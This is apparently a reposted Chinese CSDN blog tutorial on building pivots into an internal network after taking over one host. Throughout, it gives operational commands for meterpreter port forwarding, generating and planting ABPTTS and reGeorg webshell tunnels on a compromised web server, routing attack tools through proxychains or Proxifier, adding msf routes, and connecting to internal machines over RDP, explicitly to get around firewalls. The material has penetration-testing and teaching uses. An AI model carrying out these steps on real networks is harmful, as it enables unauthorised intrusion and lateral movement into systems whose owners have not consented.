搭建內網的轉發跳板
- 當成功控制一個網絡中的一台主機后,由於后面的主機都在內網中無法訪問,所以需要在跳板機上搭建代理,實現對內網中的其他主機的訪問
portfwd是一款強大的端口轉發工具,支持TCP,UDP,支持IPV4–IPV6的轉換轉發。並且內置於meterpreter。
攻擊機: 192.168.1.5 Debian
靶機: 192.168.1.4 Windows 7
192.168.1.119 Windows 2003
靶機IP為:192.168.1.119—windows 2003—x64
需要轉發端口為:80,3389
執行命令如下
if defined PSModulePath (echo ok!) else (echo sorry!)
查看使用參數
meterpreter > portfwd ‐h
添加本地33389到目標主機3389的端口轉發
meterpreter > portfwd add ‐l 33389 ‐r 192.168.1.119 ‐p 3389
添加本地30080到目標主機80的端口轉發
meterpreter> portfwd add ‐l 30080 ‐r 192.168.1.119 ‐p 80
查看端口轉發信息
meterpreter > portfwd
這時訪問本地主機的33389端口相當於訪問目標主機的3389端口
訪問本地主機的30080端口相當於訪問目標主機的80端口
這種情況需要在跳板機上使用msf拿到目標主機的shell,實際應用場景不多
ABPTTS
ABPTTS是NCC Group在2016年blackhat推出的一款將TCP流量通過HTTP/HTTPS進行流量轉發,在目前雲主機的大環境中,發揮了比較重要的作用,可以通過腳本進行RDP,SSH,Meterpreter的交互與連接。也意味着這樣可以建立一個通過80端口得流量出站來逃避防火牆。與其它http隧道不同的是,abptts是全加密。
安裝與生成payload:
git clone https://github.com/nccgroup/ABPTTS.git
pip install pycrypto
cd ABPTTS/
python abpttsfactory.py ‐o webshell
將生成的payload放入目標網站
在跳板主機上執行代理命令
python abpttsclient.py ‐c webshell/config.txt ‐u “代理網頁的URL” ‐f 跳板機IP:跳板機端口/目標機IP:目標機端口
這時訪問跳板主機的IP和端口就相當於訪問目標主機的IP和端口
這種不支持PHP
reGeorg
reGeorg的前身是2008年SensePost在BlackHat USA 2008 的 reDuh延伸與擴展。也是目前安全從業人員使用最多,范圍最廣,支持多豐富的一款http隧道。從本質上講,可以將JSP/PHP/ASP/ASPX等頁面上傳到目標服務器,便可以訪問該服務器后面的主機。
安裝:
git clone https://github.com/sensepost/reGeorg.git
pip install urllib3
將其中的網頁文件放入跳板主機的網站目錄下,PHP環境建議使用tunnel.nosocket.php,
然后測試腳本是否能正常訪問
攻擊機這時就可以搞事情啦
運行下列命令
比如:reGeorgSocksProxy.py -p 9999 -u http://192.168.80.139/zvuldrill/tunnel.nosocket.php
如果攻擊機是Windows系統,則使用Proxifier進行代理設置
- 設置代理服務器端口為9999
- 代理規則默認即可
當需要運行一個使用跳板的軟件時,
右擊“mstsc.exe”,選擇“proxifier”-》proxy socks5 127.0.0.1進行遠程連接
這時候這個軟件的流量就可以通過跳板進入內網
如果攻擊機為Linux,使用proxychains
可以下載安裝,Kali本身也帶有這個工具
設置kali的proxychains代理地址和端口(通過本地的socks5 2333端口出去)
vi /etc/proxychains.conf
- 配置好后通過 reGeory 來打通本地和目標的通道
reGeorgSocksProxy.py -p 9999 -u http://192.168.80.139/zvuldrill/tunnel.nosocket.php
本地所有工具都可通過目標服務器進一步攻擊(這樣kali的所有工具就如同全部在內網那台getshell的服務器上)
所有工具使用命令前加 proxychains
比如:proxychains msfconsole
連接內網windows機器proxychains rdesktop x.x.x.x:3389 -u test -p 123456
利用msf可以簡化很多操作
添加路由命令
run autoroute -s 192.168.80.0/24
————————————————
版權聲明:本文為CSDN博主「習慣積淀」的原創文章,遵循 CC 4.0 BY-SA 版權協議,轉載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/weixin_44479297/article/details/90481121